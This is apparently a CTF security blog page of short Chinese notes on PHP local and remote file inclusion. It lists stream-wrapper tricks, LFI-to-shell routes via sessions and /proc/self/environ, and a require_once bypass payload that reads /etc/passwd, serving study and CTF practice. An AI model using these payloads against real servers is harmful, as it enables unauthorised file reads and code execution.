Eki's blog Eki's blog
Home
  • Library

    • PHP
    • JAVA
    • Node
    • Python
  • Contest

    • D3CTF 2021 Write Up
    • 虎符CTF2021
    • 2021 红帽 Web Write Up
  • Problem Set

    • Ethernaut Write Up
Pentest
Develop
  • Friends
About
  • Website
  • Tools
  • Categories
  • Tags
  • Archives
GitHub (opens new window)

Eki

Dreamer of Dreams
Home
  • Library

    • PHP
    • JAVA
    • Node
    • Python
  • Contest

    • D3CTF 2021 Write Up
    • 虎符CTF2021
    • 2021 红帽 Web Write Up
  • Problem Set

    • Ethernaut Write Up
Pentest
Develop
  • Friends
About
  • Website
  • Tools
  • Categories
  • Tags
  • Archives
GitHub (opens new window)
  • Catalogue

  • 隐写术
  • PHP

    • PHP 代码执行相关
    • PHP中的扩展
    • PHP中函数的安全漏洞
    • PHP内核
    • PHP序列化问题
    • PHP中的协议利用
    • fastcgi
    • fi
      • include
      • require_once
      • filegetcontent/file
      • lfi -> rce
      • 参考资料
    • webshell
    • Thinkphp
    • laravel 框架
    • PHP积累
  • protocol
  • Java

  • Node

  • Python

  • Golang

  • Arbitrary Code Execution
  • Shell
  • SQLi
  • SSRF
  • SSTI
  • lfi
  • XSS
  • XXE
  • convert
  • .htaccess文件利用
  • 序列化与反序列化问题小结
  • CTF
  • PHP
Eki
2021-05-18
目录

fi

# RFI/LFI PHP文件包含

# 特殊文件

  • .htaccess

  • .user.ini

  • https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

  • https://xz.aliyun.com/t/2657

# include

  • php://input + POST报文php代码 (allow_url_include=On)

  • data://text/plain,<phpcode> (allow_url_include=On)

  • php7 php://filter/string.strip_tags=/etc/passwd

    导致php在执行过程中出现segment fault错误,这样如果再此同时上传文件那么临时文件就会被保存在/tmp目录下,不会被删除。 文件名需要爆破/tmp/phpxxxxx

  • session + lfi getshell

  • /proc/self/environ UA header lfi getshell

  • phar

# require_once

  • 重复包含poc:
php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/passwd
1

php源码分析 require_once 绕过不能重复包含文件的限制:https://www.anquanke.com/post/id/213235

# file_get_content/file

<?php
$homepage = file_get_contents('http://www.example.com/');
echo $homepage;
?>
1
2
3
4

关于file_put_contents的一些小测试: https://cyc1e183.github.io/2020/04/03/%E5%85%B3%E4%BA%8Efile_put_contents%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%B5%8B%E8%AF%95/

# lfi -> rce

https://tttang.com/archive/1395/

# 参考资料

https://xz.aliyun.com/t/5535#toc-7

php文件包含漏洞: https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/

编辑 (opens new window)
上次更新: 2022/08/09, 14:57:22
fastcgi
webshell

← fastcgi webshell→

最近更新
01
QWB CTF2022 线下赛总决赛部分题解
08-25
02
CISCN2022 总决赛部分题解
08-25
03
DSCTF2022决赛 部分writeup
08-08
更多文章>
Theme by Vdoing | Copyright © 2019-2022 EkiXu | Creative Commons License
This work is licensed under a Creative Commons Attribution 4.0 International License.
  • 跟随系统
  • 浅色模式
  • 深色模式
  • 阅读模式